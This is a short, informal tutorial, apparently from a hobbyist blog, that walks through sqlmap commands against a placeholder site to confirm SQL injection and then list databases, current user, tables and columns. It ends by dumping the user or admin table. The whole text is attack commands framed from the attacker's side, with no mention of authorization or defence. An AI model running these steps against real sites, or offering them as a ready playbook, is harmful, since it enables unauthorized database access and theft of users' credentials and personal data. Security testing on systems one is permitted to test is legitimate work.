SQL Injection with SQLMAP

cd /pentest/database/sqlmap

after that type command like this, for scanner there is a vurn SQL Injection or not :

./sqlmap.py -u http://yourtarget.com/index.php?id=1 --random-agent -threads 10 --banner

if the site there is vurn SQL Injection, continue to check the name of database with :

./sqlmap.py -u http://yourtarget.com/index.php?id=1 --dbs

 After that check the current user n current database of the site :

 ./sqlmap.py -u http://yourtarget.com/index.php?id=1 --current-user --current-db

after we know current user n current database we check how many table current database with command :

 ./sqlmap.py -u http://yourtarget.com/index.php?id=1 --tables -D [database-name]

with the many of tables in the database, usually the attacker will search table of user or admin, after attacker find the tables of user, attacker will search columns of tables user with command :

   ./sqlmap.py -u http://yourtarget.com/index.php?id=1 --columns -T [tablename] -D [database-name]

hahhaha, this last statement from me from sqlmap tutorial, :v, for dumping current tables user from the database, :

   ./sqlmap.py -u http://yourtarget.com/index.php?id=1 --dump -C [columns-name] -T [tablename] -D [database-name]

Alright, Thats all of the step using sqlmap for sql Injection, SQLmap is also there for the Windows version you can download it here. To sqlmap version of windows, we need third-party software, the python to version 2.7 And you can download it Here.

Oke Thanks You For your Attention, See You Next Time.